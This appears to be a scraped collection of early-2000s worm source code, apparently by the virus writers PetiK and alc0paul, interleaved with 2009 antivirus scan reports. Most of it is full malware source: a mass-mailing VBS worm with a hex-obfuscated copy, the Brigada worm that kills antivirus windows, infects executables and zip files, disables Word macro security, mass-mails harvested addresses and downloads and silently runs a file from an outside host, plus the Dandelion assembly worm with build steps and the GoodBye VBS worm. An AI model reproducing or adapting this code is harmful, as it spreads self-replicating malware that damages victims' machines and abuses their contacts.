End Sub Sub SendMail(email) On Error Resume Next Dim out Set out = CreateObject("Outlook.Application") Set mel = out.CreateItem(0) mel.To = email mel.Subject = "Love or Hatred ??" mel.Body = "Open this attached file and you will know if you have the love or the hatred" mel.Attachments.Add(WScript.ScriptFullName) mel.Attachments.Add (WScript.ScriptFullName) mel.Send Set out = Nothing End Sub Encrypted version On Error Resume Next Execute Q("4F6E204572726F7220526573756D65204E6...57874A456E6420537562") Function Q(swpe) For O=1 To Len(swpe) Step 2 Q=Q & Chr("&h" & Mid(swpe,O,2)) Next End Function 'Encrypt with the PetiK's VBS Hex Convert Tool

File Hatred.vbs received on 05.16.2009 17:42:47 (CET) Antivirus Version Last Update a-squared 4.0.0.101 2009.05.16 AhnLab-V3 5.0.0.2 2009.05.16 AntiVir 7.9.0.168 2009.05.15 Antiy-AVL 2.0.3.1 2009.05.15 Authentium 5.1.2.4 2009.05.16 Avast 4.8.1335.0 2009.05.15 AVG 8.5.0.336 2009.05.15 BitDefender 7.2 2009.05.16 CAT-QuickHeal 10.00 2009.05.15 ClamAV 0.94.1 2009.05.16 Comodo 1157 2009.05.08 DrWeb 5.0.0.12182 2009.05.16 eSafe 7.0.17.0 2009.05.14 eTrust-Vet 31.6.6508 2009.05.16 F-Prot 4.4.4.56 2009.05.16 F-Secure 8.0.14470.0 2009.05.15 Fortinet 3.117.0.0 2009.05.16 GData 19 2009.05.16 Ikarus T3.1.1.49.0 2009.05.16 K7AntiVirus 7.10.737 2009.05.16 Kaspersky 7.0.0.125 2009.05.16 McAfee 5616 2009.05.15 McAfee+Artemis 5616 2009.05.15 McAfee-GW-Edition 6.7.6 2009.05.15 Microsoft 1.4602 2009.05.16 NOD32 4080 2009.05.15 Norman 6.01.05 2009.05.16 nProtect 2009.1.8.0 2009.05.16 Panda 10.0.0.14 2009.05.16 PCTools 4.4.2.0 2009.05.16 Prevx 3.0 2009.05.16 Rising 21.29.52.00 2009.05.16 Sophos 4.41.0 2009.05.16 Sunbelt 3.2.1858.2 2009.05.16 Symantec 1.4.4.12 2009.05.16 TheHacker 6.3.4.1.326 2009.05.15 TrendMicro 8.950.0.1092 2009.05.15 VBA32 3.12.10.5 2009.05.16 ViRobot 2009.5.15.1737 2009.05.15 VirusBuster 4.6.5.0 2009.05.16 Additional information File size: 4043 bytes MD5...: 0917a7ca2afb01dc26afc99f642c0b6f SHA1..: aa809d611ba4ba26e9c4d65aeba3239888a0da79

Result Email-Worm.VBS.Lee.Based!IK VBS/Kristen Worm/Lee-based.3 Worm/VBS.VBS VBS/Kristen.G@mm VBS:VBSWG family@enc Worm/Generic_c.IH VBS.Hatred.A@mm VBS/Kristen.G Unclassified Malware VBS.Generic VBS/Kristen.G VBS/Kristen.G@mm Email-Worm.VBS.Lee-based VBS/Anjulie.C VBS.Hatred.A@mm Email-Worm.VBS.Lee.Based Email-Worm.VBS.Lee-based VBS/LoveLetter.gen VBS/LoveLetter.gen Worm.Lee-based.3 Virus:VBS/Leebased VBS/Lee-based VBS/Lee-based.U Worm Generic Virtool.Hex2VBS.A Worm.Mail.VBS.Lee-based.n VBS/Hatred-A VBS.LoveLetter.Var VBS/LoveLetter.gen VBS_ANJULIE.C Email-Worm.VBS.Lee-based Virtool.Hex2VBS.A

' Name : W32.HLLW.Brigada ' Author : PetiK & alc0paul ' Language : Visual Basic ' Date : 02/07/2002 ' ' ' ' Attribute VB_Name = "Module1" Option Explicit Private Declare Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (pDst As Any, pSrc As Any, ByVal ByteLen As Long) Private Declare Function GetCommandLine Lib "kernel32" Alias "GetCommandLineA" () As Long Private Declare Function lstrlen Lib "kernel32" Alias "lstrlenA" (ByVal lpString As Long) As Long Private Declare Function SHGetPathFromIDList Lib "shell32.dll" Alias "SHGetPathFromIDListA" (ByVal pidl As Long, ByVal pszPath As String) As Long Private Declare Function SHGetSpecialFolderLocation Lib "shell32.dll" (ByVal hwndOwner As Long, ByVal nFolder As Long, pidl As ITEMIDLIST) As Long Private Declare Function PostMessage Lib "user32" Alias "PostMessageA" (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, ByVal lParam As Long) As Long Private Declare Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String) As Long Private Declare Function ExitWindowsEx Lib "user32" (ByVal uFlags As Long, ByVal dwReserved As Long) As Long Private Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As Long Private Declare Function GetExitCodeProcess Lib "kernel32" (ByVal hProcess As Long, lpExitCode As Long) As Long Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long Private Declare Function InternetGetConnectedState Lib "wininet.dll" (ByRef lpdwFlags As Long, ByVal dwReserved As Long) As Long Private iResult As Long Private hProg As Long Private idProg As Long Private iExit As Long Const WM_CLOSE = &H10 Const STILL_ACTIVE As Long = &H103 Const PROCESS_ALL_ACCESS As Long = &H1F0FFF Const EWX_SHUTDOWN = 1 Const CSIDL_PERSONAL = &H5 Const CSIDL_STARTUP = &H7 Const CSIDL_TIF = &H20 Const CSIDL_WIN = &H24 Const CSIDL_WINSYS = &H25 Const MAX_PATH = 260 Private Type SHITEMID cb As Long abID As Byte End Type Private Type ITEMIDLIST mkid As SHITEMID End Type Sub Main() On Error Resume Next Dim vdir As String Dim lenhost As String Dim vc As String Dim mark As String Dim hostlen As String Dim virlen As String Dim buffhostlen As String Dim buffvirlen As String Call regcall Call killav vdir = App.path If Right(vdir, 1) <> "\" Then vdir = vdir & "\" FileCopy vdir & App.EXEName & ".exe", GetSpecialfolder(CSIDL_WIN) & "\Ms0701i32.exe" FileCopy vdir & App.EXEName & ".exe", GetSpecialfolder(CSIDL_WINSYS) & "\lolita.exe" '--------------- check if virus or worm -----------------------Open vdir & App.EXEName & ".exe" For Binary Access Read As #1 lenhost = (LOF(1)) vc = Space(lenhost) Get #1, , vc Close #1 mark = Right(vc, 2) If mark <> "b8" Then 'worm

Call extrkzip If InStr(1, GetCommLine, "-petikb8") = 0 Then Else Call wording Call zipinfect End If If InStr(1, GetCommLine, "-alcopaulb8") = 0 Then Else Call virustime End If If InStr(1, GetCommLine, "-trojanmode") = 0 Then Else ShutdownWindows EWX_SHUTDOWN End If listht GetSpecialfolder(CSIDL_TIF) Else 'virus : execute the host Open vdir & App.EXEName & ".exe" For Binary Access Read As #4 hostlen = (LOF(4) - 75264) virlen = (75264) 'worm/virus + zip component buffhostlen = Space(hostlen) buffvirlen = Space(virlen) Get #4, , buffvirlen Get #4, , buffhostlen Close #4 Open vdir & "XxX.exe" For Binary Access Write As #3 Put #3, , buffhostlen Close #3 'borrowed from murkry's vb5 virus idProg = Shell(vdir & "XxX.exe", vbNormalFocus) hProg = OpenProcess(PROCESS_ALL_ACCESS, False, idProg) GetExitCodeProcess hProg, iExit Do While iExit = STILL_ACTIVE DoEvents GetExitCodeProcess hProg, iExit Loop Kill vdir & "XxX.exe" End If '------------------------------------------------------------------Call downloader End Sub '---------------------- kill avs -------------------------------------Sub killav() On Error Resume Next Dim avn, avn1, avn2, avn3, avn4, avn5, avn6, avn7, avn8, avn9, avn10, avn11, avn12 Dim aWindow As Long Dim angReturnValue As Long Dim num3, arrr3, av avn = "Pop3trap" avn1 = "JavaScan" avn2 = "Modem Booster" avn3 = "vettray" avn4 = "Timer" avn5 = "CD-Rom Monitor" avn6 = "F-STOPW Version 5.06c" avn7 = "PC-cillin 2000 : Virus Alert" avn8 = "DAPDownloadManager" avn9 = "Real-time Scan" avn10 = "IOMON98" avn11 = "AVP Monitor" avn12 = "NAI_VS_STAT" For num3 = 0 To 12 arrr3 = Array(avn, avn1, avn2, avn3, avn4, avn5, avn6, avn7, avn8, avn9, avn10, avn11, avn12) av = arrr3(num3) aWindow = FindWindow(vbNullString, av) angReturnValue = PostMessage(aWindow, WM_CLOSE, vbNull, vbNull) Next num3 End Sub '-------------------------- download update and run it ---------------------Sub downloader() On Error Resume Next Dim databyte() As Byte If InternetGetConnectedState(0&, 0&) = 0 Then GoTo xIt Form1.Inet1.RequestTimeout = 40 databyte() = Form1.Inet1.OpenURL("http://p0th0le.tripod.com/a.exe", icByteArray) Open "c:\update.exe" For Binary Access Write As #2 Put #2, , databyte()

Close #2 Shell "c:\update.exe", vbHide xIt: End Sub '----------------------c:\WINDOWS file infection---------------Sub virustime() On Error Resume Next Dim vdir As String Dim sfile As String Dim a As String Dim arr1 Dim lenhost As String Dim vc As String Dim mark As String Dim host vdir = App.path If Right(vdir, 1) <> "\" Then vdir = vdir & "\" sfile = dir$(GetSpecialfolder(CSIDL_WIN) & "\*.exe") While sfile <> "" a = a & sfile & "/" sfile = dir$ Wend arr1 = Split(a, "/") For Each host In arr1 Open GetSpecialfolder(CSIDL_WIN) & "\" & host For Binary Access Read As #1 lenhost = (LOF(1)) vc = Space(lenhost) Get #1, , vc Close #1 mark = Right(vc, 2) If mark <> "b8" Then GoTo notinfected Else GoTo gggoop End If notinfected: infect (GetSpecialfolder(CSIDL_WIN) & "\" & host) Exit For gggoop: Next host End Sub Function infect(hostpath As String) On Error Resume Next Dim ffile Dim hostcode As String Dim vir As String Dim vircode As String Dim header As String Dim f As String vir = App.path If Right(vir, 1) <> "\" Then vir = vir & "\" Open hostpath For Binary Access Read As #1 hostcode = Space(LOF(1)) Get #1, , hostcode Close #1 Open vir & App.EXEName & ".exe" For Binary Access Read As #2 header = Space(LOF(2)) Get #2, , header Close #2 f = "b8" Open hostpath For Binary Access Write As #3 Put #3, , header Put #3, , hostcode Put #3, , f Close #3 End Function '--------------------zip infection----------------------------Sub zipinfect() On Error Resume Next list ("c:\") End Sub Sub list(dir) On Error Resume Next Dim fso, ssf, fil Set fso = CreateObject("Scripting.FileSystemObject") Set ssf = fso.GetFolder(dir).SubFolders For Each fil In ssf

infection (fil.path) list (fil.path) Next End Sub Sub infection(dir) Dim fso, cf, fil, ext Set fso = CreateObject("Scripting.FileSystemObject") Set cf = fso.GetFolder(dir).Files For Each fil In cf ext = fso.GetExtensionName(fil.path) ext = LCase(ext) If (ext = "zip") Then Shell "c:\piss.exe " & fil.path & " " & GetSpecialfolder(CSIDL_WINSYS) & "\lolita.exe", vbHide End If Next End Sub '--------------------trojan mode payload----------------------------Sub ShutdownWindows(ByVal intParamater As Integer) Dim blnReturn As Boolean blnReturn = ExitWindowsEx(intParamater, 0) End Sub '--------------------variable commandline----------------------------Sub regcall() On Error Resume Next Dim b As String, c As String, d As String, ws As Object Dim regcol, final Set ws = CreateObject("WScript.Shell") b = "-alcopaulb8" c = "-petikb8" d = "-trojanmode" regcol = Array(b, c, d) Randomize final = regcol(Int(Rnd * 3)) ws.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices\b8", GetSpecialfolder(CSIDL_WINSYS) & "\Ms0701i32.exe " & final If dir("c:\regedit.exe") <> "regedit.exe" Then FileCopy GetSpecialfolder(CSIDL_WIN) & "\regedit.exe", "c:\regedit.exe" End If End Sub '--------------------extract zip software----------------------------Sub extrkzip() On Error Resume Next Dim vdir As String Dim wormlen As String Dim rarlen As String Dim buffwormlen As String Dim buffrarlen As String vdir = App.path If Right(vdir, 1) <> "\" Then vdir = vdir & "\" Open vdir & App.EXEName & ".exe" For Binary Access Read As #1 wormlen = (LOF(1) - 63488) rarlen = (63488) buffwormlen = Space(wormlen) buffrarlen = Space(rarlen) Get #1, , buffwormlen Get #1, , buffrarlen Close #1 Open "c:\piss.exe" For Binary Access Write As #2 Put #2, , buffrarlen Close #2 Shell "c:\piss.exe c:\brigada8.zip " & vdir & App.EXEName & ".exe", vbHide End Sub '--------------------e-mail collect and e-mailing----------------------------Sub listht(dir) On Error Resume Next Dim fso, ssfh, filh Set fso = CreateObject("Scripting.FileSystemObject") Set ssfh = fso.GetFolder(dir).SubFolders For Each filh In ssfh infht (filh.path) listht (filh.path) Next End Sub Sub infht(dir)

Dim mlto As String Dim fso, cfh, filh, ext, textline, q Dim j As Long, cnt As Long Set fso = CreateObject("Scripting.FileSystemObject") Set cfh = fso.GetFolder(dir).Files For Each filh In cfh ext = fso.GetExtensionName(filh.path) ext = LCase(ext) If (ext = "htm") Or (ext = "html") Then Open filh.path For Input As #1 Do While Not EOF(1) Line Input #1, textline q = q & textline Loop Close #1 For j = 1 To Len(q) If Mid(q, j, 7) = "mailto:" Then mlto = "" cnt = 0 Do While Mid(q, j + 7 + cnt, 1) <> """" mlto = mlto + Mid(q, j + 7 + cnt, 1) cnt = cnt + 1 Loop Call Worming(mlto) End If Next End If Next End Sub Function Worming(mail As String) On Error Resume Next Dim a, b, c Set a = CreateObject("Outlook.Application") Set b = a.GetNameSpace("MAPI") If a = "Outlook" Then b.Logon "profile", "password" Set c = a.CreateItem(0) c.Recipients.Add mail c.Subject = "check us out" c.Body = "we exist to give everyone a smiley face... :)" c.Attachments.Add "c:\brigada8.zip" c.Send c.DeleteAfterSubmit = True b.Logoff End If End Function '--------------------commandline parser----------------------------Private Function GetCommLine() As String Dim RetStr As Long, SLen As Long Dim Buffer As String RetStr = GetCommandLine SLen = lstrlen(RetStr) If SLen > 0 Then GetCommLine = Space$(SLen) CopyMemory ByVal GetCommLine, ByVal RetStr, SLen End If End Function '--------------------get special folder----------------------------Private Function GetSpecialfolder(CSIDL As Long) As String Dim r As Long Dim IDL As ITEMIDLIST Dim path As String r = SHGetSpecialFolderLocation(100, CSIDL, IDL) If r = 0 Then path$ = Space$(512) r = SHGetPathFromIDList(ByVal IDL.mkid.cb, ByVal path$) GetSpecialfolder = Left$(path, InStr(path, Chr$(0)) - 1) Exit Function End If GetSpecialfolder = "" End Function '------------------ document infection --------------------------Sub wording() On Error Resume Next Dim vdir As String vdir = App.path If Right(vdir, 1) <> "\" Then vdir = vdir & "\" FileCopy vdir & App.EXEName & ".exe", "c:\XXXview.exe"

Open "c:\v.r" For Output As #2 Print #2, "REGEDIT4" Print #2, "[HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security]" Print #2, """Level""=dword:00000001" Print #2, "[HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security]" Print #2, """Level""=dword:00000001" Print #2, """AccessVBOM""=dword:00000001" Close #2 Shell "c:\regedit.exe /s c:\v.r", vbHide Kill "c:\v.r" Open "c:\nl.tmp" For Output As #9 Print #9, "Sub document_close()" Print #9, "On Error Resume Next" Print #9, "Open ""c:\xp.exp"" For Output As 2" Print #9, "Print #2, ""sub document_open()""" Print #9, "Print #2, ""On Error Resume Next""" Print #9, "Print #2, ""jbo = ActiveDocument.Shapes(1).OLEFormat.ClassType""" Print #9, "Print #2, ""With ActiveDocument.Shapes(1).OLEFormat""" Print #9, "Print #2, "" .ActivateAs ClassType:=jbo""" Print #9, "Print #2, "" .Activate""" Print #9, "Print #2, ""End With""" Print #9, "Print #2, ""end sub""" Print #9, "Close 2" Print #9, "Set fso = CreateObject(""Scripting.FileSystemObject"")" Print #9, "Set nt = ActiveDocument.VBProject.vbcomponents(1).codemodule" Print #9, "Set iw = fso.OpenTextFile(""c:\xp.exp"", 1, True)" Print #9, "nt.DeleteLines 1, nt.CountOfLines" Print #9, "i = 1" Print #9, "Do While iw.atendofstream <> True" Print #9, "b = iw.readline" Print #9, "nt.InsertLines i, b" Print #9, "i = i + 1" Print #9, "Loop" Print #9, "ActiveDocument.Shapes.AddOLEObject _" Print #9, "FileName:=""c:\XXXview.exe"", _" Print #9, "LinkToFile:=False" Print #9, "ActiveDocument.Save" Print #9, "Open ""c:\b8.r"" For Output As #3" Print #9, "Print #3, ""REGEDIT4""" Print #9, "Print #3, ""[HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security]""" Print #9, "Print #3, """"""Level""""=dword:00000001""" Print #9, "Print #3, ""[HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security]""" Print #9, "Print #3, """"""Level""""=dword:00000001""" Print #9, "Print #3, """"""AccessVBOM""""=dword:00000001""" Print #9, "Close #3" Print #9, "Shell ""c:\regedit.exe /s c:\b8.r"", vbHide" Print #9, "Kill ""c:\b8.r""" Print #9, "End Sub" Close #9 Open GetSpecialfolder(CSIDL_STARTUP) & "\startup.vbs" For Output As #6 Print #6, "On Error Resume Next" Print #6, "Set fso = CreateObject(""Scripting.FileSystemObject"")" Print #6, "Set oword = CreateObject(""Word.Application"")" Print #6, "oword.Visible = False" Print #6, "Set nt = oword.NormalTemplate.vbproject.vbcomponents(1).codemodule" Print #6, "Set iw = fso.OpenTextFile(""c:\nl.tmp"", 1, True)" Print #6, "nt.DeleteLines 1, nt.CountOfLines" Print #6, "i = 1" Print #6, "Do While iw.atendofstream <> True" Print #6, "b = iw.readline" Print #6, "nt.InsertLines i, b" Print #6, "i = i + 1" Print #6, "Loop" Print #6, "oword.NormalTemplate.Save" Print #6, "oword.NormalTemplate.Close" Print #6, "oword.quit" Close #6 End Sub

File Brigada.exe received on 05.16.2009 11:20:53 (CET) Antivirus a-squared AhnLab-V3 AntiVir Antiy-AVL Authentium Avast AVG BitDefender CAT-QuickHeal ClamAV Comodo DrWeb eTrust-Vet F-Prot F-Secure Fortinet GData Ikarus K7AntiVirus Kaspersky McAfee McAfee+Artemis Microsoft NOD32 Norman nProtect Panda PCTools Prevx Rising Sophos Sunbelt Symantec TheHacker TrendMicro VBA32 ViRobot VirusBuster Version 4.0.0.101 5.0.0.2 7.9.0.168 2.0.3.1 5.1.2.4 4.8.1335.0 8.5.0.336 7.2 10.00 0.94.1 1157 5.0.0.12182 31.6.6508 4.4.4.56 8.0.14470.0 3.117.0.0 19 T3.1.1.49.0 7.10.735 7.0.0.125 5616 5616 1.4602 4080 6.01.05 2009.1.8.0 10.0.0.14 4.4.2.0 3.0 21.29.52.00 4.41.0 3.2.1858.2 1.4.4.12 6.3.4.1.326 8.950.0.1092 3.12.10.5 2009.5.15.1737 4.6.5.0 Last Update 2009.05.16 2009.05.15 2009.05.15 2009.05.15 2009.05.15 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.15 2009.05.08 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.16 2009.05.16 2009.05.14 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.15 Result Email-Worm.Win32.Alcaul!IK Win32/CrazyBox.worm.75264 Worm/Alcaul.T1 Worm/Win32.Alcaul W32/Malware!7ad5 Win32:Alcaul-AG Win32/Alcarys Win32.Alcaul.TB@mm I-Worm.Alcaul.t Worm.Petik-3 Worm.Win32.Petal.A Win32.HLLM.Generic.64 Win32/Alcaul W32/Malware!7ad5 Email-Worm.Win32.Alcaul.t W32/Alcaul.T!worm Win32.Alcaul.TB@mm Email-Worm.Win32.Alcaul Email-Worm.Win32.Alcaul.t Email-Worm.Win32.Alcaul.t W32/Alcop.ai@MM W32/Alcop.ai@MM Worm:Win32/Alcolita.A@mm Win32/Petal.A Alcaul.AZ@mm Worm/W32.Alcaul.75264 Worm Generic.LC Worm.Alcaul High Risk Cloaked Malware Worm.Mail.Alcaul.bl W32/Alcaul-V W32.Alcaul.Worm W32.Alcaul.Worm WORM_CRAZYBOX.A Win32.HLLW.Alcaul.t I-Worm.Alcop.CD

Additional information File size: 75264 bytes MD5...: 0a8cdb77f334f3f5d542509ed70ace70 SHA1..: 95e493da53b720985007df8f28817b94b7d9a902 PEiD..: UPX 2.90 [LZMA] -&gt; Markus Oberhumer, Laszlo Molnar &amp; John Reiser

comment # Name : I-Worm.Dandelion Author : PetiK Date : November 7th Size : 6144 byte Action: Copy itself to * WINDOWS\SYSTEM\Explor.exe Add in the key HKLM\Software\Microsoft\Windows\CurrentVersion\Run the value * MS Explor = WINDOWS\SYSTEM\Explor.exe In each run, it copies itself with a randome name on %windows% path. It record the name into the file "dandelion.txt" in the same folder. To delete the worm : Look at the file Del_Dandelion.vbs To built the worm : @echo off tasm32 /ml /m9 Dandelion tlink32 -Tpe -c -x -aa Dandelion,,,import32,dllz.def upx -9 Dandelion.exe if exist *.obj del *.obj if exist *.map del *.map Notes of the authors: # .586p .model flat .code JUMPS api macro a extrn a:proc call a endm include useful.inc include myinclude.inc start: twin_worm: push mov push push api mov push push push api add mov stosd mov stosd mov stosd pop push push push api 50 esi,offset orig_worm esi 0 GetModuleFileNameA edi,offset copy_worm edi 50 edi GetSystemDirectoryA edi,eax eax,"pxE\" eax,".rol" eax,"exe" edi 0 edi esi CopyFileA ; edi =

; esi = name of file

; copy itself

push 9 push edi push 1 @pushsz "MS Explor" @pushsz "Software\Microsoft\Windows\CurrentVersion\Run"

push api end_twin: ; call call

80000002h SHSetValueA spread_computer htm_file 0 ExitProcess

; regedit

end_worm: push api

spread_computer proc pushad call generator_name mov edi,offset genname push push api push api push push push api 50 offset windir GetWindowsDirectoryA offset windir SetCurrentDirectoryA 0 edi offset orig_worm CopyFileA

@pushsz "dandelion.txt" @pushsz "A New Copy Of Worm.Dandelion" push edi @pushsz "Copy Of Worm" api WritePrivateProfileStringA end_spread_computer: popad ret generator_name: mov edi,offset genname api GetTickCount push 9 pop ecx xor edx,edx div ecx inc edx mov ecx,edx gen_name: push ecx api GetTickCount push 'Z'-'A' pop ecx xor edx,edx div ecx xchg eax,edx add al,'A' stosb api GetTickCount push 100 pop ecx xor edx,edx div ecx push edx api Sleep pop ecx loop gen_name mov eax,'exe.' stosd ret spread_computer endp htm_file proc pushad mov edi,offset ptkdir push edi push 50 push edi api GetSystemDirectoryA

add edi,eax mov eax,"glP\" stosd mov eax,"KTP_" stosd pop edi push edi api CreateDirectoryA push edi api SetCurrentDirectoryA create_htm: @pushsz "\WinPatch.htm" push offset ptkdir api lstrcat push 0 push 80h push 2 push 0 push 1 push 40000000h push offset ptkdir api CreateFileA mov [hHTM],eax push 0 push offset byte push e_htm - s_htm push offset s_htm push [hHTM] api WriteFile push [hHTM] api CloseHandle end_htm_file: popad ret htm_file endp .data ; === copy_worm === orig_worm db 50 dup (0) copy_worm db 50 dup (0) ; === spread_computer === windir db 50 dup (0) genname db 15 dup (?) ; === htm_file === ptkdir db 50 dup (0) hHTM dd ? byte dd ? s_htm: db '<HTML><HEAD><TITLE>Windows98</TITLE></HEAD>',CRLF db '<BODY TEXT=yellow LINK=red VLINK=red BGCOLOR="#000080">',CRLF db '<P ALIGN="RIGHT">',CRLF db '<A HREF="http://www.microsoft.com/isapi/redir.dll?' db 'prd=windows98&clcid=&pver=4.10&ar=wallpaper">',CRLF db '<IMG SRC="res://membg.dll/membg.gif" BORDER=0 WIDTH=329 HEIGHT=47></A>&nbsp;' db '</P>',CRLF db '</BODY>',CRLF db '<P ALIGN="CENTER">',CRLF db '<script language=vbscript>',CRLF db 'on error resume next',CRLF db 'set fso=createobject("scripting.filesystemobject")',CRLF db 'if err.number=429 then',CRLF db 'document.write "<font>Please accept the ActiveX to see this HTML wallpaper !' db '<br><a href =''javascript:location.reload()''>CLICK HERE</a> to reload and ' db 'click yes</font>"',CRLF db 'else',CRLF db 'document.write "<font>Click on the Windows logo to download the new patch.' db '<br>This patch correct the bug about the IIS and MIME.<br><br></font>"',CRLF db 'document.write "<font>(You must be connected tp inet !!)</font>"',CRLF db 'end if',CRLF db '</script>',CRLF db '</HTML>',CRLF e_htm:

signature author end start end

db "I-Worm.Dandelion " db "Coded by PetiK - 2001",00h

'VBS.GoodBye Written in France. 'My last Worm. I say Good Bye On Error Resume Next dim w,f,win,sys,file Set w=CreateObject("WScript.Shell") Set fso=CreateObject("Scripting.FileSystemObject") Set win=fso.GetSpecialFolder(0) Set sys=fso.GetSpecialFolder(1) Set tmp=fso.GetSpecialFolder(2) Set wo=fso.GetFile(WScript.ScriptFullName) If wo <> (sys&"\Cmmon32.vbs") Then MsgBox "Look at this new Game",vbinformation,"New Game For You" img="4D5A50000200000004000F00FFFF0000.." lire=decr(img) Set pic=fso.CreateTextFile(win&"\New_Prog.exe",true) pic.Write lire pic.Close 'w.Run win&"\New_Prog.exe",1,false MsgBox "Script : "&wo&vbCrLf&"Error : Cannot read this script"&vbCrLf&"Code : 800A000D",vbcritical,"Windows Script Host" End If If not fso.FolderExists(sys&"\Plg_PTK") Then fso.CreateFolder(sys&"\Plg_PTK") End If x=0 do while x<100 a=x extension wo.Copy(sys&"\Plg_PTK\Save"&a&crext) x=x+1 loop wo.Copy(sys&"\Cmmon32.vbs") wo.Copy(sys&"\Plg_PTK\Important.vbs") run=("HKLM\Software\Microsoft\Windows\CurrentVersion\Run\MS Cmmon32") w.RegWrite run,("wscript "&sys&"\Cmmon32.vbs") If Day(Now)=11 and Month(Now)=9 Then w.RegDelete ("HKLM\Software\Microsoft\Windows\CurrentVersion\Run\MS Cmmon32") End If cache=w.RegRead("HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Cache") desktop=w.RegRead("HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Desktop") personal=w.RegRead("HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Personal") progfile=w.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\ProgramFilesDir") commonfile=w.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\CommonFilesDir") Mail(win) Mail(sys) Mail(tmp) Mail(cache) Mail(desktop) Mail(personal) Mail(progfile) Mail(commonfile) WormM "" Function extension text="ComExeBatDocXlsPptTifBmpJpgGifHtmHttMp3WavMid" randomize (timer) tfile=int(rnd(1)*14)+1 crext="."& mid(text,((tfile-1)*3)+1,3) crext=crext&".vbs" End Function Function decr(octet) For hexa=1 To Len(octet) Step 2 decr=decr & Chr("&h" & Mid(octet, hexa, 2)) Next

End Function Function WormM(dir) If Dir = "" Then If fso.FileExists("C:\mirc\mirc.ini") then dir="C:\mirc If fso.FileExists("C:\mirc32\mirc.ini") then dir="C:\mirc32 If fso.FileExists(pogfile&"\mirc\mirc.ini") then dir=pogfile&"\mirc\mirc.ini" If fso.FileExists(pogfile&"\mirc32\mirc.ini") then dir=pogfile&"\mirc32\mirc.ini" End If If dir <> "" Then Set mirc=fso.CreateTextFile(dir&"\script.ini", True) mirc.WriteLine "[scipt]" mirc.WriteLine "n0=ON 1:JOIN:#:{ ( $nick == $me ) { halt }" mirc.WriteLine "n1 = /dcc send $nick " &sys&"\Plg_PTK\Important.vbs" mirc.WriteLine "n2=}" mirc.Close End If End Function

Function Mail(dossier) If not fso.FileExists(sys&"\Plg_PTK\Info.txt") Then Set DF=fso.CreateTextFile(sys&"\Plg_PTK\Info.txt") DF.WriteLine "Files Found By VBS.GoodBye.Worm :" DF.WriteBlankLines(1) DF.Close End If If fso.FolderExists(dossier) Then For Each File in fso.GetFolder(dossier).Files ext=fso.GetExtensionName(File.Name) If (ext="htm") or (ext="html") or (ext="php") or (ext="htt") Then Set see = fso.OpenTextFile(File.path, 1) liretout = see.ReadAll For i = 1 to len(liretout) mailto = mid(liretout,i,7) If mailto = "mailto:" Then msgbox mailto,vbinformation,File.path Exit For else End If Next see.Close Set DF = fso.OpenTextFile(sys&"\Plg_PTK\Info.txt", 8, True) DF.WriteLine date& " " &time& " => " &File.path DF.Close End If Next End If End Function INFO.TXT Files Found By VBS.GoodBye.Worm : 28.11.01 28.11.01 28.11.01 28.11.01 28.11.01 28.11.01 28.11.01 28.11.01 28.11.01 28.11.01 28.11.01 28.11.01 28.11.01 28.11.01 28.11.01 28.11.01 28.11.01 28.11.01 28.11.01 28.11.01 28.11.01 18:40:22 18:40:22 18:40:22 18:40:22 18:40:22 18:40:26 18:46:50 18:46:50 18:46:50 18:46:50 18:46:50 18:46:54 18:48:20 18:48:20 18:48:20 18:48:20 18:48:24 18:49:45 18:49:45 18:49:45 18:49:45 => => => => => => => => => => => => => => => => => => => => => C:\WINDOWS\WinHelp.htm C:\WINDOWS\hrecmd.html C:\WINDOWS\hobby.html C:\WINDOWS\hhobby.html C:\WINDOWS\htalent.html C:\WINDOWS\TEMP\RND130.htm C:\WINDOWS\WinHelp.htm C:\WINDOWS\hrecmd.html C:\WINDOWS\hobby.html C:\WINDOWS\hhobby.html C:\WINDOWS\htalent.html C:\WINDOWS\TEMP\RND130.htm C:\WINDOWS\hrecmd.html C:\WINDOWS\hobby.html C:\WINDOWS\hhobby.html C:\WINDOWS\htalent.html C:\WINDOWS\TEMP\RND130.htm C:\WINDOWS\WinHelp.htm C:\WINDOWS\hrecmd.html C:\WINDOWS\hobby.html C:\WINDOWS\hhobby.html

28.11.01 28.11.01 28.11.01 28.11.01 28.11.01 28.11.01 28.11.01 28.11.01 28.11.01 28.11.01 28.11.01 28.11.01 28.11.01 28.11.01 28.11.01 28.11.01 28.11.01 28.11.01 28.11.01 28.11.01 28.11.01 28.11.01 28.11.01 28.11.01 28.11.01 28.11.01 28.11.01 28.11.01 28.11.01 28.11.01 28.11.01 28.11.01 28.11.01 28.11.01 28.11.01 28.11.01 28.11.01 28.11.01 28.11.01 28.11.01 28.11.01 28.11.01 28.11.01 28.11.01 28.11.01 28.11.01 28.11.01 28.11.01 28.11.01 28.11.01 28.11.01 28.11.01 28.11.01 28.11.01 28.11.01 28.11.01 28.11.01 28.11.01 28.11.01 28.11.01 28.11.01 28.11.01 28.11.01 28.11.01 28.11.01 28.11.01 28.11.01 28.11.01 28.11.01 28.11.01 28.11.01 28.11.01 28.11.01 28.11.01 28.11.01 28.11.01 28.11.01 28.11.01

